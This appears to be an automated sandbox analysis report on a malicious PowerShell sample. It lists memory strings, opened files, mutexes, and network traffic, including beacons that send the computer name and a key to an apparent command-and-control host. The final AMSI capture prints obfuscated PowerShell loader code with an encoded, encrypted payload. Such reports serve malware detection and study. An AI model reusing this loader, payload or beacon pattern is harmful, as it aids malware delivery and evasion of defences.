Click to jump to signature section
Source: | Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbg source: powershell.exe, 00000000.00000002.161618795792.0000020372017000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: softy.pdbdll source: powershell.exe, 00000000.00000002.161617922953.0000020371FAB000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: System.Management.Automation.pdb source: powershell.exe, 00000000.00000002.161617081692.0000020371F54000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.161588048250.0000020359B2E000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: mscorlib.pdb source: powershell.exe, 00000000.00000002.161588048250.0000020359B2E000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.pdbck.dll:o source: powershell.exe, 00000000.00000002.161617922953.0000020371FAB000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: \??\C:\Windows\symbols\dll\Microsoft.PowerShell.Commands.Utility.pdb_ source: powershell.exe, 00000000.00000002.161620032683.0000020372462000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbt source: powershell.exe, 00000000.00000002.161618795792.0000020372017000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: pdbpdblib.pdb source: powershell.exe, 00000000.00000002.161617081692.0000020371F54000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: \mscorlib.pdb source: powershell.exe, 00000000.00000002.161617081692.0000020371F54000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: utomation.pdb source: powershell.exe, 00000000.00000002.161617081692.0000020371F54000.00000004.00000020.00020000.00000000.sdmp |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | HTTP traffic: GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151 Host: www.google.com Connection: Keep-Alive |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | HTTP traffic: GET /sorry/index?continue=http://www.google.com/&q=EgRmgZnuGJ6b2rsGIjAxjuX0nnmE9pXb-mu15k1hC7d0WnnyhUjQFRpVlA0mpn39vWg4s9Oh70YRfCOUgJ4yAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151 Host: www.google.com Cookie: NID=520=Qlf5_e7uh9F6LOV1eHY3aJacr7K71vICdn6f-9BT0f9oBcqC7roi5p1zVoGHw-DcZgf04xVW9E2kcos-z0Aoszf3QuXC4WjSh4CiOD4XWjJ7fxJEAM-rEtanYj2meMS5LrTcrYthdZ24u7Z4JdQl5HmKgfgwPisVtt0uY7cRbWvZLtqfOthivqEJQqC0RHDc8J4wCA |
Source: global traffic | HTTP traffic detected: GET /r2wafo1tlyhtr.php?id=computer&key=85323043609&s=527 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: kcehmenjdibnmni.topConnection: Keep-Alive |
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: www.google.comConnection: Keep-Alive |
Source: global traffic | HTTP traffic detected: GET /sorry/index?continue=http://www.google.com/&q=EgRmgZnuGJ6b2rsGIjAxjuX0nnmE9pXb-mu15k1hC7d0WnnyhUjQFRpVlA0mpn39vWg4s9Oh70YRfCOUgJ4yAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: www.google.comCookie: NID=520=Qlf5_e7uh9F6LOV1eHY3aJacr7K71vICdn6f-9BT0f9oBcqC7roi5p1zVoGHw-DcZgf04xVW9E2kcos-z0Aoszf3QuXC4WjSh4CiOD4XWjJ7fxJEAM-rEtanYj2meMS5LrTcrYthdZ24u7Z4JdQl5HmKgfgwPisVtt0uY7cRbWvZLtqfOthivqEJQqC0RHDc8J4wCA |
Source: global traffic | HTTP traffic detected: GET /r2wafo1tlyhtr.php?id=computer&key=85323043609&s=527 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: kcehmenjdibnmni.topConnection: Keep-Alive |
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: www.google.comConnection: Keep-Alive |
Source: global traffic | HTTP traffic detected: GET /sorry/index?continue=http://www.google.com/&q=EgRmgZnuGJ6b2rsGIjAxjuX0nnmE9pXb-mu15k1hC7d0WnnyhUjQFRpVlA0mpn39vWg4s9Oh70YRfCOUgJ4yAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: www.google.comCookie: NID=520=Qlf5_e7uh9F6LOV1eHY3aJacr7K71vICdn6f-9BT0f9oBcqC7roi5p1zVoGHw-DcZgf04xVW9E2kcos-z0Aoszf3QuXC4WjSh4CiOD4XWjJ7fxJEAM-rEtanYj2meMS5LrTcrYthdZ24u7Z4JdQl5HmKgfgwPisVtt0uY7cRbWvZLtqfOthivqEJQqC0RHDc8J4wCA |
Source: powershell.exe, 00000000.00000002.161588459064.000002035B10C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.161588459064.000002035ABF9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://$jxqdz4t7fsrimgw/$vu8adjo1ishtxq5.php? |
Source: powershell.exe, 00000000.00000002.161588459064.0000020359E3A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://$jxqdz4t7fsrimgw/$vu8adjo1ishtxq5.php?id=$env:computername&key=$xvkiwrsecfu&s=527 |
Source: powershell.exe, 00000000.00000002.161588048250.0000020359B56000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06 |
Source: powershell.exe, 00000000.00000002.161588048250.0000020359B56000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0 |
Source: powershell.exe, 00000000.00000002.161617922953.0000020371FAB000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.micr0 |
Source: powershell.exe, 00000000.00000002.161588048250.0000020359B56000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.v |
Source: powershell.exe, 00000000.00000002.161588459064.000002035AEF5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.161588459064.000002035A996000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.161588459064.000002035AF74000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://kcehmenjdibnmni.top |
Source: powershell.exe, 00000000.00000002.161588459064.000002035AEF5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.161588459064.000002035A996000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://kcehmenjdibnmni.top/r2wafo1tlyhtr.php?id=computer&key=85323043609&s=527 |
Source: powershell.exe, 00000000.00000002.161588459064.000002035AEF5000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://kcehmenjdibnmni.top/r2wafo1tlyhtr.php?id=computer&key=85323043609&s=527p |
Source: powershell.exe, 00000000.00000002.161610081837.0000020369C87000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe |
Source: powershell.exe, 00000000.00000002.161588459064.0000020359E3A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png |
Source: powershell.exe, 00000000.00000002.161588459064.0000020359E3A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.pngXz |
Source: powershell.exe, 00000000.00000002.161588459064.0000020359E3A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/ |
Source: powershell.exe, 00000000.00000002.161588459064.0000020359C11000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name |
Source: powershell.exe, 00000000.00000002.161588459064.0000020359E3A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/wsdl/ |
Source: powershell.exe, 00000000.00000002.161617081692.0000020371F47000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.161588459064.0000020359E3A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html |
Source: powershell.exe, 00000000.00000002.161588459064.0000020359E3A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.htmlXz |
Source: powershell.exe, 00000000.00000002.161588459064.000002035AF74000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.161588459064.000002035AF93000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.google.com |
Source: powershell.exe, 00000000.00000002.161588459064.000002035ABF9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.google.com/ |
Source: powershell.exe, 00000000.00000002.161588459064.000002035AF93000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.google.com/&q=EgRmgZnuGJ6b2rsGIjAxjuX0nnmE9pXb-mu15k1hC7d0WnnyhUjQFRpVlA0mpn39vWg4s9Oh70Y |
Source: powershell.exe, 00000000.00000002.161588459064.000002035AAD5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.161588459064.000002035AF74000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.google.com/sorry/index?continue=http://www.google.com/&q=EgRmgZnuGJ6b2rsGIjAxjuX0nnmE9pXb |
Source: powershell.exe, 00000000.00000002.161588459064.000002035AAD5000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.google.comP |
Source: powershell.exe, 00000000.00000002.161588048250.0000020359B56000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.quovadis.bm0 |
Source: powershell.exe, 00000000.00000002.161588459064.0000020359C11000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore68 |
Source: powershell.exe, 00000000.00000002.161610081837.0000020369C87000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/ |
Source: powershell.exe, 00000000.00000002.161610081837.0000020369C87000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon |
Source: powershell.exe, 00000000.00000002.161610081837.0000020369C87000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License |
Source: powershell.exe, 00000000.00000002.161588459064.000002035AF74000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://csp.withgoogle.com/csp/gws/other-hp |
Source: powershell.exe, 00000000.00000002.161588459064.0000020359E3A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester |
Source: powershell.exe, 00000000.00000002.161588459064.0000020359E3A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/PesterXz |
Source: powershell.exe, 00000000.00000002.161610081837.0000020369C87000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe |
Source: powershell.exe, 00000000.00000002.161588048250.0000020359B56000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ocsp.quovadisoffshore.com0 |
Source: powershell.exe, 00000000.00000002.161588459064.000002035AFA5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.161588459064.000002035AAEA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.161588459064.000002035AF74000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.161588459064.000002035AF93000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/recaptcha/api.js |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL |
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:940:304:WilStaging_02 |
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:940:120:WilError_03 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: [IO.Compression.CompressionMode]::Decompress)) $rp08wzxnsfkig73.(([char[]]@((1339-(8834-7562)),(150627/1357),(9800-(9510+178)),(2574-2453),(7910-(69815746/8921)),(714396/6436)) -join ''))( $4ov2mqhnr3kw8zd ) $rp08wzxnsfkig73.(([char[]]@((628594/(8892+(-4581+(9823-(12626-7874))))),(-2382+(532+1958)),(802308/7228),(1054-939),(709020/(8123-(6732-(33875322/6018))))) -join ''))()$e7s2cg8qmxlfodn.((-join (@((565279/(-198+8635)),(-5745+(12148-6295)),(318-207),(-187+302),(891527/(4031+(27284444/(2664+3025)))))| ForEach-Object { [char]$_ })))()[byte[]] $e0y1npd5kl2fmho = $4ov2mqhnr3kw8zd.(([char[]]@((-9476+(13653-(11982-(67293170/(17684-(1563+7591)))))),(-3895+4006),(5307-(39021448/7444)),(872556/(64653338/(6955+1492))),(844-(4907790/6723)),(509735/5255),(608509/5029)) -join ''))() $foq9mpagd7vcz3s=$e0y1npd5kl2fmho return $foq9mpagd7vcz3s}[System.Text.Encoding]::ascii.((-join (@((567929/(8819-820)),(-3706+3807),(-6755+6871),(-1534+(4300-2683)),(8745-8629),(177156/1554),(387660/(4513-(-3103+3924))),(2695-(6654-(1313+(26242632/9522)))),(-1748+1851))| ForEach-Object { [char]$_ })))((w5740pyiq2srcvotux9ne13dlb8 "ffk+dHdxbDVyN8D5OR0rs+a282L2iK7kwz/4rYYZlkvHFwHljhSpQnZHY84WL2YvwF7s5l8i+BCpiZabnKdLXD3QLg44JTVzG7x6OwCkk2cjpCKLHhDJyYyk38bxEKJbHYTe89BW++oIypuAFX3Y6slMEcGMxYGZp9HFY+DWAxqZ6JCElpetw/i+IiuayIaREI/Z4whNE8uEwoiMpy0ZO1ku0w+q7LIV/wnNgZyC3yLNynKTmZxMfw6ql+EVayZNjwLOGKjy5+CH5Hv+OYWIj+WmgkZO39qkifWfzM2fuyUcb5vMt6JceY37o0gbGaimo0xrFgXgM4EmyncXjIjXruq+Z0LbAsDcirDKxNIr+ki4EkH0van5BhkPpZBPykjTgOVLu1KDn9uDtvk3OSG66Qj+7a5j4Y240P0a84LU/P/kSiEGV0PTmrVnHxyKmsi76KnO0IlnJl24WpeGEopfg9CC58pKTpkRn7n12zhuMdsI6xCUipv/seAGk1qBxIwVH311m9mJQcGUgs17mMiZ2gKH6lCFFIIYEFdbydC7M144hpnoXfHBxaPc+1+5pT6TCfx/4y7ih2BN8+vzcMVLGkrel/eYozM9xlnV/aElEWok1GQcwqBLHyyUWMBdufymA92ULx3YCdke1AKepr88s70f+SWr7d+zwm/cpTLsEXiaEMa+JWWO/rjEQdknWaAnQUgg3yxlYkeDhitbsTHXba76Ns+Xz3JTomdAE6zeSZCz7C8LuZKLiZL6Q4qK9BPSPdn5KEnXusBOmvrA9WpxQGUv9TDH7Cwu6l5CGVrUr72SpeW5uIZSygYjtwtO8NNetOFvBPmwA4DD1LgvkbY2TxQK96iA/fiLPsCyfMLeUaAHQoPGxb3K9EzmeEl7fpyyazj0RUGeL+4kgKHUDcLRCl5QWw584NiBond+3Dmj3VotDlO/OEAhWuv+aUJbS6VyEP1LkPxEuYT60wc7Ad1TCNDA9NEd2uMYS1O7MD0wpSAs+WbsDtP2XqtrPmAYHkyslngs2NoKqfcYs5WKHQ0OCAWWua7F/CoqlQUZWynuckuK06PangqzScyEmO6r6kpCrSyrisuKndut2NNcGQHHnoOg/+K9tLD7ogMIAPXvNPvDWwE8XsIk9kTCD+5IHiE4vsDzuIqsr76lpAKLjQyIlVHLl7iBv6j0qZY4FarJSvxkP3mi0V1NxFfF+mZVfaUhY30vrWLMwL2633vJzrun+jXh+TpRmtxBJwcb3XIhb0FvFpCSdHsW8NESGfATUr8/GpCTduYNH+5dXT896BFH2Bp0aUH56SZnIiFFOTxwKbzLmqnDma/CuOJ1CIg4 |